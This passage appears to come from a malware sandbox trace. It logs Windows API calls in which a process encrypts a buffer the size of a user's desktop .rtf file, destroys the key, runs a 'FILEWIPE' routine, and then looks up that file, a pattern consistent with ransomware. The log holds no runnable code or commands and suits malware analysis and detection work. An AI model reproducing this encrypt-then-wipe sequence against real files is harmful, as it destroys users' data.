cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0030.419] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da158, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da158*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0030.419] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.419] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.419] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0030.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.419] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.419] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.419] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.419] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.419] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.419] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.420] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.420] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0030.420] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.420] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.420] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.420] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.420] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.420] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0030.420] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.421] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xbbad, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xbbb0) returned 1 [0030.421] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.421] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.421] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.421] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.421] CharLowerBuffW (in: lpsz="byte[48049]", cchLength=0xb | out: lpsz="byte[48049]") returned 0xb [0030.421] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.422] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.422] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.422] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.422] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8d32e8*, pdwDataLen=0x6ae220*=0xbbad, dwBufLen=0xbbb0 | out: pbData=0x8d32e8*, pdwDataLen=0x6ae220*=0xbbb0) returned 1 [0030.422] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.422] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.423] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.423] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.423] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.423] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.423] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0030.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.423] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.423] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.423] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.423] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.423] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.423] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.423] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.423] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.423] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0030.423] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.425] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.425] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.425] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.427] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.427] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.427] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0030.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.427] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.427] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.427] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0030.427] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.427] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0030.427] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.427] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.428] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.428] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.428] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.428] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.428] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0030.428] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.428] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.428] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0030.428] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0030.428] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.428] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.428] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.428] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.428] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.428] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.428] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.428] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.429] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.429] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.429] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.429] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.429] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.429] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0030.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.429] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.429] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.429] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0030.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.429] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.429] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.429] FreeLibrary (hLibModule=0x754b0000) returned 1 [0030.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0030.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0030.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0030.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.430] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.431] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.438] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.438] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.438] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0030.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0030.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.438] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.439] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.439] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c881f0, ftCreationTime.dwHighDateTime=0x1d5c219, ftLastAccessTime.dwLowDateTime=0x909c3920, ftLastAccessTime.dwHighDateTime=0x1d5be0c, ftLastWriteTime.dwLowDateTime=0x909c3920, ftLastWriteTime.dwHighDateTime=0x1d5be0c, nFileSizeHigh=0x0, nFileSizeLow=0xbbad, dwReserved0=0x0, dwReserved1=0x777648, cFileName="T2TLwD.rtf", cAlternateFileName="")) returned 